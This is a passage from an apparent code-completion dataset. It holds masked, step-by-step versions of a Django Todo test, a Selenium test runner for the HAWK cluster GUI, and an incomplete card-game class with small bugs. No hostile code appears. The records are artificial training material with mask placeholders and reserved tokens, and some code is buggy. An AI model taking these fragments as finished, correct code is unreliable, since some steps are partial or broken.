todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
# todo not saved because mark_done don't save already done todos
self.assertEqual(Todo.objects.count(), 0)
|
normal
|
{
"blob_id": "5c81ddbc8f5a162949a100dbef1c69551d9e267a",
"index": 37,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-4": "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n # todo not saved because mark_done don't save already done todos\n self.assertEqual(Todo.objects.count(), 0)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
<|reserved_special_token_0|>
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
<|reserved_special_token_0|>
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'
)
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
args = parser.parse_args()
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args
.port, browser=args.browser.lower(), version=args.test_version.lower())
results = hawk_test_results.resultSet()
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'
)
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
args = parser.parse_args()
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args
.port, browser=args.browser.lower(), version=args.test_version.lower())
results = hawk_test_results.resultSet()
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
#!/usr/bin/python3
"""HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome"""
import argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results
### MAIN
# Command line argument parsing
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')
parser.add_argument('-b', '--browser', type=str, required=True,
help='Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost',
help='Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630',
help='TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='',
help='Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=True,
help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='',
help='root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='',
help='Generate hawk_test.results file')
args = parser.parse_args()
# Create driver instance
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,
browser=args.browser.lower(),
version=args.test_version.lower())
# Initialize results set
results = hawk_test_results.resultSet()
# Establish SSH connection to verify status only if SSH password was supplied
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
# Resources to create
if args.prefix and not re.match(r"^\w+$", args.prefix.lower()):
print("ERROR: Prefix must contain only numbers and letters. Ignoring")
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
# Tests to perform
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
# Save results if run with -r or --results
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
|
flexible
|
{
"blob_id": "874668d5f3ea61b6aabde7b784078b431961a9c9",
"index": 9096,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\n<mask token>\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\n<mask token>\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-4": "<mask token>\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-5": "#!/usr/bin/python3\n\"\"\"HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome\"\"\"\n\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\n\n### MAIN\n\n# Command line argument parsing\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')\nparser.add_argument('-b', '--browser', type=str, required=True,\n help='Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost',\n help='Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630',\n help='TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='',\n help='Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=True,\n help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='',\n help='root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='',\n help='Generate hawk_test.results file')\nargs = parser.parse_args()\n\n# Create driver instance\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,\n browser=args.browser.lower(),\n version=args.test_version.lower())\n\n# Initialize results set\nresults = hawk_test_results.resultSet()\n\n# Establish SSH connection to verify status only if SSH password was supplied\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\n\n# Resources to create\nif args.prefix and not re.match(r\"^\\w+$\", args.prefix.lower()):\n print(\"ERROR: Prefix must contain only numbers and letters. Ignoring\")\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\n\n# Tests to perform\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\n\n# Save results if run with -r or --results\nif args.results:\n results.logresults(args.results)\n\nquit(results.get_failed_tests_total())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import loops
class Card():
#to make a card you must type Card("Name of Card")
def check_cat(self,string):
if "Cat" in string:
return True
return False
def __init__(self,string):
self.type = string
self.cat = self.check_cat(self.type)
# self.image_back = image_back
# self.image_front = image_front
def __str__(self):
return self.type
#negates any action, except a defuse
def nope(self,arr_players,cards,turn_order):
count = 0
for i,k in enumerate(arr_players):
if i != turn_order:
for i,k in enumerate(k.hand):
if k == cards[11]:
count += 1
if count > 0:
print("A nope card can be played")
decision = input("Would a player like to play a nope card? (y/n)")
while decision != "y" and decision != "n":
decision = input("Would a player like to play a nope card? (y/n) ")
if decision == "n":
return False
elif decision == 'y':
for i,k in enumerate(arr_players):
print(str(i)+"-"+k.name)
player = int(input("Which player would like to play the nope card?"))
while (player < 0 or player > len(arr_players)) and players == turn_order:
player = int*input("Which player would like to play the nope card?")
arr_players[player].hand.remove(cards[11])
return True
return False
#makes another player choose a card to give away to current player
def favor(self,hand,player,arr_players,played_card):
recipient = loops.phase_of_taking(arr_players,player)
card_taken = arr_players[recipient].hand.pop(loops.give_card(arr_players,recipient))
print(card_taken,"was given")
recipient.hand.remove(card_taken)
player.hand.append(card_taken)
return True,False
#allows a player to steal a card from another player
def steal(self,hand,player,arr_players,played_card):
recipient = loops.phase_of_taking(arr_players,player)
card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(arr_players,recipient))
print("You stole",card_stolen.type)
hand.remove(played_card)
player.hand.append(card_stolen)
return True,False
#makes the player skip a turn
def skip(self,attack,pick):
print("Your turn has been skipped")
pick = False
return pick,attack
#the player makes the next person take his turn as well, forcing them to take 2 turns
def attack(self,attack,pick):
attack = True
pick = False
return pick,attack
#see future draws the top three cards, prints the three cards, and puts the cards back in the correct positions
def see_future(self,decker):
if decker.cards_left() < 3:
for i in range(decker.cards_left()):
card = decker.draw_top(i)
print(card.type)
decker.add_card(card,i)
else:
for i in range(3):
card = decker.draw_top(i)
print(card.type)
decker.add_card(card,i)
|
normal
|
{
"blob_id": "3b71ef6c3681b8c5e6aadf2d125c35cbf3a12661",
"index": 6248,
"step-1": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n <mask token>\n\n def __str__(self):\n return self.type\n <mask token>\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n\n def __init__(self, string):\n self.type = string\n self.cat = self.check_cat(self.type)\n\n def __str__(self):\n return self.type\n\n def nope(self, arr_players, cards, turn_order):\n count = 0\n for i, k in enumerate(arr_players):\n if i != turn_order:\n for i, k in enumerate(k.hand):\n if k == cards[11]:\n count += 1\n if count > 0:\n print('A nope card can be played')\n decision = input('Would a player like to play a nope card? (y/n)')\n while decision != 'y' and decision != 'n':\n decision = input(\n 'Would a player like to play a nope card? (y/n) ')\n if decision == 'n':\n return False\n elif decision == 'y':\n for i, k in enumerate(arr_players):\n print(str(i) + '-' + k.name)\n player = int(input(\n 'Which player would like to play the nope card?'))\n while (player < 0 or player > len(arr_players)\n ) and players == turn_order:\n player = int * input(\n 'Which player would like to play the nope card?')\n arr_players[player].hand.remove(cards[11])\n return True\n return False\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n\n def __init__(self, string):\n self.type = string\n self.cat = self.check_cat(self.type)\n\n def __str__(self):\n return self.type\n\n def nope(self, arr_players, cards, turn_order):\n count = 0\n for i, k in enumerate(arr_players):\n if i != turn_order:\n for i, k in enumerate(k.hand):\n if k == cards[11]:\n count += 1\n if count > 0:\n print('A nope card can be played')\n decision = input('Would a player like to play a nope card? (y/n)')\n while decision != 'y' and decision != 'n':\n decision = input(\n 'Would a player like to play a nope card? (y/n) ')\n if decision == 'n':\n return False\n elif decision == 'y':\n for i, k in enumerate(arr_players):\n print(str(i) + '-' + k.name)\n player = int(input(\n 'Which player would like to play the nope card?'))\n while (player < 0 or player > len(arr_players)\n ) and players == turn_order:\n player = int * input(\n 'Which player would like to play the nope card?')\n arr_players[player].hand.remove(cards[11])\n return True\n return False\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n 